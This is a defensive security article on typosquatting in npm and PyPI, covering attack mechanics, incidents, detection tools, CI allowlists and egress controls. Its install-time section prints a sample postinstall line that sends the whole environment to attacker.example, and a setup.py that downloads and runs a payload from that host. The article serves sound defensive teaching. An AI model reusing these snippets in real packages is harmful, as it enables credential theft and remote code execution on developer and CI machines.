Typosquatting in Package Registries: Detection, Prevention, and Runtime Defence

The Attack Surface

Every package registry is a publicly writable namespace. npm alone hosts over 2.5 million packages. PyPI hosts over 500,000. Any user can register an account without identity verification and publish a package in under five minutes. The barrier between a developer mistyping a dependency name and executing attacker-controlled code on their machine, in their CI runner, and potentially in their production environment is a single character.

Typosquatting exploits this. Attackers register package names that are plausible misspellings, visual lookalikes, or structural variants of popular packages. They rely on the mechanics of fast-moving development workflows: a developer tabs to a terminal, types npm install requst, and the session is compromised before the next command runs. The package installs, runs its postinstall script, exfiltrates credentials, and reports success. The developer sees no error.

This is not a theoretical attack class. It has produced repeated, documented incidents across npm, PyPI, and RubyGems. The controls to address it exist, they compose, and most teams have implemented none of them.

Mechanics of Typosquatting Attacks

Levenshtein Distance Attacks

The most common variant is a simple edit-distance attack. An attacker identifies a high-download-count package (requests, lodash, express, axios) and registers names within one or two edits. Names at Levenshtein distance 1 from requests include request (drop the final ‘s’; a real package that has itself confused users), rquests (drop the ‘e’), requests2, rrequests, and requestss. Each is a plausible fat-finger or fast-typist error.

Attackers automate enumeration. A script iterates over the top 1,000 packages by weekly download count, generates all Levenshtein-distance-1 variants, filters for names not yet registered, and publishes malicious packages to each available name. At peak periods in npm’s history, hundreds of squatted packages have been discovered in batch sweeps.
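
The same enumeration is useful defensively, for example to decide which names to monitor or reserve around a package you publish. The following is a minimal sketch, assuming names are limited to lowercase ASCII letters, digits, and the separators shown; the function names and the alphabet are illustrative and not taken from any registry tool.

```python
import string

# Characters a package name may contain in this sketch (an assumption; adjust per registry).
ALPHABET = string.ascii_lowercase + string.digits + "-_."


def distance_one_variants(name: str) -> set[str]:
    """Return every string exactly one edit (delete, insert, substitute) away from name."""
    variants = set()
    for i in range(len(name) + 1):
        head, tail = name[:i], name[i:]
        if tail:
            variants.add(head + tail[1:])              # delete the character at position i
            for ch in ALPHABET:
                variants.add(head + ch + tail[1:])     # substitute the character at position i
        for ch in ALPHABET:
            variants.add(head + ch + tail)             # insert a character at position i
    variants.discard(name)  # substituting a character with itself recreates the name
    variants.discard("")
    return variants


def unclaimed_variants(name: str, registered: set[str]) -> set[str]:
    """Variants of name that are not in the supplied set of registered names."""
    return distance_one_variants(name) - registered
```

Feeding unclaimed_variants the output of a registry listing gives the set of names an attacker could still claim; the registered set is supplied by the caller, so the sketch makes no network requests itself.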

Homoglyph Attacks

Homoglyph attacks substitute visually similar characters in package names. Where a registry, mirror, or internal index accepts Unicode names, an attacker can swap in a lookalike from another script: event-sтream (with a Cyrillic ‘т’) can be misread as event-stream in many typefaces, and İo.js (with a dotted capital I) looks like io.js at a glance. Where names are restricted to ASCII, characters that are visually ambiguous in common terminal fonts (l, 1, and I; 0 and O) remain available.

npm’s registry enforces ASCII-only package names, which eliminates the Unicode variant for npm itself. PyPI likewise restricts project names to ASCII letters, digits, periods, hyphens, and underscores, so on both registries the practical risk is ASCII lookalikes. RubyGems has had inconsistent enforcement. The attack surface varies by registry.
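
A lockfile or internal index can be checked for both kinds of lookalike with a few lines of standard-library code. This is a sketch under stated assumptions: the confusables table is a deliberately tiny, hypothetical one, and the function names are illustrative.

```python
import unicodedata


def non_ascii_characters(name: str) -> list[tuple[str, str]]:
    """Return (character, Unicode name) pairs for every non-ASCII character in name."""
    return [
        (ch, unicodedata.name(ch, "UNKNOWN"))
        for ch in name
        if ord(ch) > 127
    ]


# Hypothetical, minimal table of ASCII lookalikes; extend it for the fonts your team uses.
ASCII_CONFUSABLES = str.maketrans({"1": "l", "I": "l", "0": "o", "O": "o"})


def ascii_skeleton(name: str) -> str:
    """Map visually ambiguous ASCII characters to one representative, then lowercase."""
    return name.translate(ASCII_CONFUSABLES).lower()
```

Two different names with the same ascii_skeleton are candidates for manual review; any name for which non_ascii_characters returns a non-empty list deserves a closer look before it is installed.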

Package Scope Confusion

npm’s scoped package system (@org/package-name) creates its own confusion surface. A package published as @types/lodash (a legitimate types package) is distinct from types-lodash (which could be squatted) and @lodash/types (a plausible-but-fake scoped variant). Attackers register scope-adjacent names: lodash-types, type-lodash, @types-lodash/core.

A related variant is the missing-scope attack: if your project depends on @mycompany/auth as a private package and an attacker publishes a public mycompany-auth to npm, developers who see the dependency name without the scope in documentation or Slack messages may install the wrong package. This overlaps with dependency confusion, but the delivery mechanism is social rather than resolver-based.
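
One way to catch scope-adjacent names is to reduce every name to its word tokens and compare. The sketch below assumes you keep a list of your organisation's private package names; flatten and scope_lookalikes are hypothetical helpers, not part of npm.

```python
import re


def flatten(name: str) -> frozenset[str]:
    """Reduce a package name to its set of word tokens, ignoring scope syntax and order."""
    return frozenset(t for t in re.split(r"[@/._-]+", name.lower()) if t)


def scope_lookalikes(private_names: list[str], candidate: str) -> list[str]:
    """Return private packages whose tokens match candidate but whose exact name differs."""
    tokens = flatten(candidate)
    return [p for p in private_names if p != candidate and flatten(p) == tokens]
```

With private_names set to ["@mycompany/auth"], the candidate mycompany-auth is reported as a lookalike, while the exact scoped name is not. Token matching is intentionally coarse: it will not catch type-lodash against @types/lodash, which needs an edit-distance check on the tokens as well.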

Real Incidents

event-stream (npm, 2018)

The event-stream attack is the most studied npm supply chain incident prior to 2024. The package had approximately 1.5 million weekly downloads. Its original maintainer, Dominic Tarr, transferred ownership to a previously unknown npm user named right9ctrl after the new user offered to maintain it. The new maintainer added flatmap-stream as a dependency and injected malicious code into that package.

The malicious code was obfuscated and targeted specifically at developers with the bitpay/copay Bitcoin wallet application in their dependency tree. It decrypted a payload at runtime using a key derived from a description field in the target’s package.json, exfiltrated wallet credentials, and reported to an attacker-controlled endpoint. For all other consumers, the malicious code path was never triggered — which is why it went undetected for over two months.

This was not pure typosquatting — the takeover was social engineering — but the flatmap-stream injection followed typosquatting patterns: a new package, a plausible name, minimal public history, published to amplify reach through a high-traffic dependency. The detection failure was that no automated system checked whether newly added transitive dependencies had any public track record.

ctx and phpass (PyPI and Packagist, 2022)

In May 2022, two long-dormant packages were taken over to demonstrate how exposed abandoned names are: ctx on PyPI, and phpass, a PHP password hashing library distributed through Packagist rather than PyPI. Neither was a typo variant. The person responsible, who later described the work as security research, gained control of the existing names (for ctx, by re-registering the expired domain behind the maintainer’s email address and resetting the account password) and published malicious versions that exfiltrated environment variables to a remote endpoint.

The environment variable exfiltration is particularly damaging in CI contexts. AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, DATABASE_URL, GITHUB_TOKEN — all of these are standard CI environment variables that an import ctx at the top of a test file would silently ship to an attacker.

The researcher notified PyPI and the packages were removed, but not before establishing how trivially any lapsed package name could be weaponised. PyPI subsequently implemented policies around reusing abandoned package names, but the underlying namespace re-registration problem remains active in lower-traffic portions of the index.

Install-Time Attack Vectors

npm Lifecycle Scripts

npm executes lifecycle scripts at install time. The preinstall, install, and postinstall hooks in a package’s package.json run as shell commands with the same privileges as the user running npm install. For most developer workstations, that is the interactive user’s account. For CI runners, that is whatever service account the runner uses — which commonly has access to deployment credentials, cloud provider tokens, and repository secrets injected as environment variables.

{
  "name": "requst",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "node -e \"require('https').get('https://attacker.example/c?d='+Buffer.from(JSON.stringify(process.env)).toString('base64'));\""
  }
}

This single-line postinstall script exfiltrates the entire environment to an attacker endpoint on every install. It runs synchronously during npm install. The developer sees npm’s standard progress output. Nothing looks wrong.
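
Because the script sees whatever environment npm was started with, one mitigation is to start the install with a reduced environment. The following is a minimal sketch, assuming the install step needs only the variables in ALLOWED_ENV; that list and the helper names are assumptions to adapt, not npm features.

```python
import os
import subprocess

# Variables the install step is assumed to need; everything else is withheld.
ALLOWED_ENV = frozenset({"PATH", "HOME", "LANG"})


def scrubbed_env(environ: dict[str, str], allowed: frozenset[str] = ALLOWED_ENV) -> dict[str, str]:
    """Return a copy of environ that contains only allowlisted variable names."""
    return {key: value for key, value in environ.items() if key in allowed}


def run_install(command: list[str]) -> int:
    """Run an install command so that only allowlisted variables are visible to it."""
    return subprocess.run(command, env=scrubbed_env(dict(os.environ))).returncode
```

Calling run_install(["npm", "ci"]) from the CI entry point means a postinstall script that serialises process.env finds no cloud or repository tokens in it. Secrets that later steps need can be injected after the install step completes.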

Binary Downloads in Lifecycle

A more sophisticated variant avoids inline code — which might be caught by signature-based scanners — and uses the lifecycle script to download and execute a binary:

{
  "scripts": {
    "postinstall": "node scripts/install.js"
  }
}

Here, scripts/install.js detects the operating system, fetches a platform-appropriate binary from a URL, marks it executable, and runs it. The binary is not present in the package tarball (avoiding static analysis of the tarball content), is downloaded over HTTPS (appearing as legitimate traffic), and executes with the user’s full permissions.

Native add-on packages — those using node-gyp — have a legitimate reason to run compile scripts at install time, which attackers exploit as cover. The pattern of “download a prebuilt binary instead of compiling” is common in legitimate packages (esbuild, puppeteer, playwright), which makes behavioural detection harder.
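
Since install scripts are common in legitimate packages, a practical first step is simply to know which dependencies declare them. npm 7 and later record this in package-lock.json as a hasInstallScript flag on each entry; the sketch below lists those entries. The function name is illustrative.

```python
import json


def packages_with_install_scripts(lockfile_text: str) -> list[str]:
    """Return lockfile package paths that npm marked with hasInstallScript."""
    lock = json.loads(lockfile_text)
    return sorted(
        path
        for path, meta in lock.get("packages", {}).items()
        if path and meta.get("hasInstallScript")  # the "" key is the root project
    )
```

Reviewing this list whenever it changes keeps the set of packages allowed to run code at install time small and explicit.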

Python’s setup.py and Build Backends

Python packages using the legacy setup.py format execute arbitrary Python when pip install builds them from a source distribution. Modern packages using pyproject.toml with PEP 517 build backends (hatchling, flit, setuptools) still execute build hooks in that case; only a prebuilt wheel installs without running package-supplied code. A malicious setup.py has the same capability as a malicious npm postinstall script: full filesystem access, network access, environment variable access.

from setuptools import setup
import urllib.request, os

urllib.request.urlretrieve(
    "https://attacker.example/payload",
    "/tmp/.update"
)
os.chmod("/tmp/.update", 0o755)
os.system("/tmp/.update &")

setup(name="reqeusts", version="1.0.0")

Detection Tooling

Socket.dev

Socket analyses packages at the npm and PyPI registry level before they reach your dependency tree. Rather than checking CVE databases (which cannot catch novel malicious packages that have no assigned CVE), Socket performs static behavioural analysis of package code: which APIs it calls, whether it uses eval or the Function constructor, whether it makes network requests, whether it touches the filesystem outside its own directory, and whether it reads environment variables.

Socket produces a risk score and categorised signals for each package. The network signal fires when a package makes outbound connections. The environment signal fires when it reads process.env. The eval signal fires on dynamic code execution. These signals are not individually dispositive — axios legitimately makes network requests — but their combination and context (a new package, few downloads, similarity to a popular name) forms a detection surface that catches typosquatters.

Integrate Socket via its GitHub App (blocks PRs that add packages with high risk scores) or the CLI:

npx socket npm install requst

Socket intercepts the install, analyses the target package and its dependencies, and blocks installation if any package exhibits malicious signals — before the package runs on your machine.

GuardDog

GuardDog is an open-source scanner from Datadog that checks packages on npm and PyPI for indicators of malicious behaviour. It combines semantic analysis (code patterns associated with malware) with heuristic checks (package name similarity to popular packages, suspicious metadata).

pip install guarddog

# Scan a single package before installing
guarddog pypi scan requests

# Scan a requirements.txt
guarddog pypi verify requirements.txt

# npm
guarddog npm scan requst

GuardDog’s name similarity check computes Levenshtein distance between the target package name and the top 5,000 most-downloaded packages on the registry. A distance below the configured threshold (default: 2) triggers a finding under GuardDog’s typosquatting rule. This is the automated equivalent of a human noticing that requst looks wrong.
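
The underlying idea fits in a few lines. The sketch below is not GuardDog's implementation; it is a plain dynamic-programming edit distance plus a lookup against a caller-supplied list of popular names, with max_distance as an assumed, adjustable threshold.

```python
def levenshtein(a: str, b: str) -> int:
    """Classic dynamic-programming edit distance (insert, delete, substitute)."""
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        current = [i]
        for j, cb in enumerate(b, start=1):
            current.append(min(
                previous[j] + 1,               # delete ca
                current[j - 1] + 1,            # insert cb
                previous[j - 1] + (ca != cb),  # substitute, free when the characters match
            ))
        previous = current
    return previous[-1]


def similar_popular_names(name: str, popular: list[str], max_distance: int = 1) -> list[str]:
    """Popular packages within max_distance edits of name, excluding an exact match."""
    return [p for p in popular if p != name and levenshtein(name, p) <= max_distance]
```

A non-empty result is a prompt for review, not a verdict: legitimate packages such as request and requests sit one edit apart, so the popular list usually needs an accompanying set of known-good neighbours.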

Run GuardDog in CI as a pre-install gate:

# .github/workflows/dependency-check.yml
- name: GuardDog scan
  run: |
    pip install guarddog
    guarddog npm verify package.json --exit-non-zero-on-finding

OSV-Scanner

OSV-Scanner queries the Open Source Vulnerabilities database for known malicious packages and vulnerabilities in your dependency tree. Unlike GuardDog, it does not perform heuristic analysis of new packages — it checks against a known-bad database. Use it as a complementary layer: GuardDog catches novel typosquats through behavioural heuristics; OSV-Scanner catches packages that have already been reported malicious.

go install github.com/google/osv-scanner/cmd/osv-scanner@latest

osv-scanner --lockfile package-lock.json
osv-scanner --lockfile requirements.txt

OSV-Scanner supports lock files for npm, PyPI, Go modules, Cargo, Maven, and others. Run it against committed lock files rather than node_modules — the lock file is the auditable artifact.

Enforcing Package Allowlists in CI

npm: --ignore-scripts and Lock File Integrity

npm install --ignore-scripts disables all lifecycle scripts during installation. No preinstall, postinstall, or install hooks execute. For most application dependency installs in CI, this is the correct default: your application code does not need packages to compile native add-ons or download binaries during CI. If specific packages require scripts (e.g., esbuild), run them explicitly after the lockfile-verified install.

# CI install: no scripts, exact lockfile
npm ci --ignore-scripts

npm ci (as opposed to npm install) requires a package-lock.json, installs exactly what it records, and removes any existing node_modules directory before it starts. It will fail if:

  • package-lock.json is absent
  • The dependencies declared in package.json do not match the lockfile
  • The lockfile was generated with a different npm major version (in some configurations)

The integrity field in package-lock.json is a SHA-512 hash of each package tarball. npm ci verifies every package against its recorded hash before extracting it. This does not prevent a malicious package from being added to the lockfile in the first place — but it does prevent the installed packages from diverging from what was reviewed at PR time.
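
The check itself is simple to reproduce, which is useful when auditing a tarball outside npm. The following is a sketch assuming the integrity value uses the Subresource Integrity format found in lockfiles, for example sha512-<base64 digest>; the function name is illustrative.

```python
import base64
import hashlib

# Algorithms that appear in lockfile integrity strings, strongest first.
ALGORITHMS = ("sha512", "sha384", "sha256", "sha1")


def matches_integrity(tarball: bytes, integrity: str) -> bool:
    """Check tarball bytes against an SRI string, using the strongest algorithm listed."""
    entries = [entry.partition("-") for entry in integrity.split()]
    for algorithm in ALGORITHMS:
        expected = [digest for name, _, digest in entries if name == algorithm]
        if expected:
            actual = base64.b64encode(hashlib.new(algorithm, tarball).digest()).decode("ascii")
            return actual in expected
    return False  # no supported algorithm present
```

Downloading the tarball named in the lockfile's resolved field and passing its bytes to matches_integrity confirms that the registry is still serving the artefact that was reviewed.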

To make script suppression the default for everyone who works in the repository, commit the setting:

# .npmrc (committed to the repository)
audit=true
fund=false
ignore-scripts=true

With ignore-scripts=true in .npmrc, every developer and CI runner that uses this repository’s npm configuration will install without executing lifecycle scripts.

Package Allowlist with npm

For high-assurance environments, maintain an explicit allowlist of permitted packages. Any dependency not on the allowlist fails the build:

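#!/usr/bin/env bash
# scripts/check-packages.sh
# Fails the build if package-lock.json contains a package that is not on the allowlist.
set -euo pipefail

ALLOWLIST="allowed-packages.txt"
LOCKFILE="package-lock.json"

# Take the text after the last "node_modules/" so that scoped (@scope/name)
# and nested packages resolve to their full package name.
blocked=0
while read -r pkg; do
  if ! grep -qxF -- "$pkg" "$ALLOWLIST"; then
    echo "BLOCKED: $pkg is not on the package allowlist" >&2
    blocked=1
  fi
done < <(jq -r '.packages | keys[] | select(. != "") | sub("^.*node_modules/"; "")' "$LOCKFILE" | sort -u)

# Report every blocked package before failing, rather than stopping at the first
exit "$blocked"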

This is operationally expensive for large dependency trees but appropriate for critical services or shared build tooling.

PyPI: pip-audit, Requirements Hashing, Private Mirror

pip-audit

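pip-audit checks the packages in an environment or requirements file against the PyPI advisory database, and optionally against OSV, for known vulnerabilities. It reports published advisories, not suspicious names, so for typosquatting specifically combine it with GuardDog: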

pip install pip-audit
pip-audit -r requirements.txt

Requirements Hashing

pip supports hash-checked installation mode, which verifies that every downloaded package matches a recorded SHA-256 or SHA-512 hash before installation:

# requirements.txt with hashes (digests shown are illustrative; generate real ones as described below)
requests==2.31.0 \
    --hash=sha256:58cd2187423d77b8d5e82b1a4f692cc47cd2b3ef3fb4a86dcf2f7e8e6d7e2f34 \
    --hash=sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1

Generate the hashes file:

pip install pip-tools
pip-compile --generate-hashes requirements.in -o requirements.txt

Install with hash verification:

pip install --require-hashes -r requirements.txt --no-deps

--no-deps prevents pip from resolving additional transitive dependencies not in the requirements file — any transitive dependency must be explicitly listed with its hash. This is the pip equivalent of npm ci: the exact set of packages and their exact contents are pinned and verified.
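
pip rejects an unhashed requirement at install time, but the same rule can be checked earlier, for example in a pre-commit hook. This is a simplified sketch that assumes the one-requirement-per-logical-line layout pip-compile produces; it is not a full requirements parser, and the function name is illustrative.

```python
def unpinned_or_unhashed(requirements_text: str) -> list[str]:
    """Return requirement specifiers that lack an exact '==' pin or a --hash option."""
    # Join backslash-continued lines so each requirement becomes one logical line.
    logical = requirements_text.replace("\\\n", " ")
    problems = []
    for line in logical.splitlines():
        line = line.split(" #")[0].strip()  # drop trailing comments
        if not line or line.startswith("#") or line.startswith("-"):
            continue  # blank lines, comments, and global options such as --index-url
        if "==" not in line or "--hash=" not in line:
            problems.append(line.split()[0])
    return problems
```

An empty result means every requirement is pinned to one version and carries at least one hash; anything else names the entries to fix before the file is merged.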

Private Mirror as Allowlist

A private PyPI mirror (Nexus Repository, Artifactory, devpi, or AWS CodeArtifact) proxies the public registry and can enforce a package allowlist. Only packages explicitly approved for your organisation are available for install; any package not in the mirror is unavailable regardless of its public PyPI existence.

# pip.conf
# No trusted-host entry: it would disable TLS certificate verification for the mirror.
[global]
index-url = https://nexus.example.com/repository/pypi-proxy/simple/

Configure the mirror to require an approval workflow before proxying new packages. An engineer who types requst (the typosquat) instead of requests will find it unavailable; the approval workflow gives a human the opportunity to notice the name collision.

Runtime Defence: Blocking Unexpected Network Calls

Network Policy During npm install

The highest-assurance defence against postinstall exfiltration is preventing outbound network connections during package installation entirely. For CI runners on Kubernetes, apply a NetworkPolicy that blocks egress except to the package registry:

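apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: ci-runner-install-policy
  namespace: ci
spec:
  podSelector:
    matchLabels:
      role: ci-runner
  policyTypes:
    - Egress
  egress:
    # DNS to the cluster resolver (assumed to run in kube-system), so the
    # registry hostname can still be resolved
    - ports:
        - port: 53
          protocol: UDP
        - port: 53
          protocol: TCP
      to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: kube-system
    # HTTPS to the registry CDN only
    - ports:
        - port: 443
          protocol: TCP
      to:
        - ipBlock:
            cidr: 104.16.0.0/13  # Cloudflare range (npm registry CDN); verify against Cloudflare's published list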

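During npm install, outbound connections to hosts outside the allowed range are dropped. A postinstall script that attempts to reach attacker.example gets a connection timeout rather than a successful exfiltration, provided that endpoint is not served from the same CDN range: an IP-based rule cannot distinguish the registry from other sites behind the same CDN, so an egress proxy that allowlists by hostname is the stricter option. Combine this with --ignore-scripts for defence in depth: even if a script runs (e.g., via a native add-on build), it has far fewer places to call home.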

Firejail for Local Developer Installs

On developer workstations where Kubernetes network policies are not available, use firejail to sandbox npm install with a network allowlist:

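# Allow only the registry's addresses during install.
# firejail's --netfilter option takes a rules file in iptables-restore format,
# not inline commands. npm-registry.net is a hypothetical file that accepts DNS
# and the registry's IP ranges on port 443 and drops all other output.
firejail \
  --net=eth0 \
  --dns=8.8.8.8 \
  --netfilter=/etc/firejail/npm-registry.net \
  npm install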

This is a developer ergonomics trade-off. Some packages (those that download platform binaries in postinstall) will fail under this policy. But it creates a forcing function: packages that require outbound network access during install must be explicitly approved.

Monitoring: Alerting on New Transitive Dependencies

A PR that adds one direct dependency may silently add 30 transitive dependencies. They appear only in the lockfile diff, which review tools usually collapse and reviewers rarely read. Any one of them could be a typosquat of a popular package pulled in by the new direct dependency.

Automate this check in CI. Compare the set of packages in the PR branch lockfile against the set in the base branch and alert on any new entries:

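#!/usr/bin/env bash
# scripts/check-new-deps.sh
# Lists packages that the PR adds to package-lock.json and scans each with GuardDog.
set -euo pipefail

# Print package names from a lockfile on stdin. Taking the text after the last
# "node_modules/" keeps scoped names (@scope/name) and nested packages intact.
list_packages() {
  jq -r '.packages | keys[] | select(. != "") | sub("^.*node_modules/"; "")' | sort -u
}

BASE_PACKAGES=$(git show origin/main:package-lock.json | list_packages)
CURRENT_PACKAGES=$(list_packages < package-lock.json)

# comm -13 keeps lines that appear only in the second (current) list
NEW_PACKAGES=$(comm -13 <(echo "$BASE_PACKAGES") <(echo "$CURRENT_PACKAGES"))

if [ -n "$NEW_PACKAGES" ]; then
  echo "New packages introduced by this PR:"
  echo "$NEW_PACKAGES"

  # Run GuardDog against each new package; the flag makes a finding fail the scan
  while IFS= read -r pkg_name; do
    guarddog npm scan "$pkg_name" --exit-non-zero-on-finding || {
      echo "GuardDog flagged: $pkg_name" >&2
      exit 1
    }
  done <<< "$NEW_PACKAGES"
fi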

Integrate this into your PR checks. The check should:

  1. Enumerate all packages in the new lockfile not present in the base branch lockfile
  2. Run GuardDog against each new package name
  3. Run OSV-Scanner against the full lockfile
  4. Post a summary comment to the PR listing new transitive dependencies for human review

This directly addresses the event-stream pattern: a new transitive dependency added by a legitimate direct dependency update is surfaced for automated analysis and human review before the PR merges, rather than arriving unnoticed.

For Python, generate the full dependency tree before and after the change:

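# Before (base branch): compile the base branch's requirements.in
git show origin/main:requirements.in > /tmp/base-requirements.in
pip-compile --no-header --no-annotate /tmp/base-requirements.in -o /tmp/base-requirements.txt

# After (current branch)
pip-compile --no-header --no-annotate requirements.in -o /tmp/pr-requirements.txt

# Diff: added lines are new direct or transitive dependencies
diff /tmp/base-requirements.txt /tmp/pr-requirements.txt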
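
A raw diff also shows version bumps, which can bury the names that are genuinely new. The sketch below extracts only added package names from two compiled requirements files; it assumes name==version lines as pip-compile writes them, and the function names are illustrative.

```python
import re


def pinned_names(requirements_text: str) -> set[str]:
    """Extract normalised package names from 'name==version' lines."""
    names = set()
    for line in requirements_text.splitlines():
        match = re.match(r"^([A-Za-z0-9][A-Za-z0-9._-]*)(\[[^\]]*\])?==", line)
        if match:
            # PEP 503 normalisation: runs of '-', '_' and '.' become one hyphen.
            names.add(re.sub(r"[-_.]+", "-", match.group(1)).lower())
    return names


def new_dependencies(base_text: str, pr_text: str) -> list[str]:
    """Package names present in the PR's compiled requirements but not in the base."""
    return sorted(pinned_names(pr_text) - pinned_names(base_text))
```

Each name returned by new_dependencies can then be passed to guarddog pypi scan, mirroring the npm check above.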

Integration with Broader Supply Chain Controls

Typosquatting defence does not stand alone. It is one layer of a supply chain security programme. The other layers are covered in adjacent articles: dependency confusion defence addresses the namespace resolution attack class, and SBOM generation and consumption provides the inventory foundation that makes any dependency monitoring programme auditable.

The combined posture is:

  • Before install: GuardDog name similarity check + Socket.dev behavioural analysis on all new packages in PRs
  • At install: --ignore-scripts to suppress lifecycle execution; hash verification via lockfile (npm ci, --require-hashes)
  • During install: Network policy blocking egress to non-registry hosts
  • After install: OSV-Scanner against the lockfile; new transitive dependency alert with GuardDog scan of each addition
  • Ongoing: Private registry proxy as allowlist; periodic re-scan of full dependency tree as the known-malicious database updates

The operational cost of this stack is low once the CI integration exists. GuardDog and OSV-Scanner run in seconds. The network policy is infrastructure configuration that is written once. The primary cost is the allowlist approval workflow for new packages, which is an explicit, auditable decision rather than an implicit one.

An attacker registering requst on npm is betting that none of these checks are in place. For most repositories, that bet is currently correct.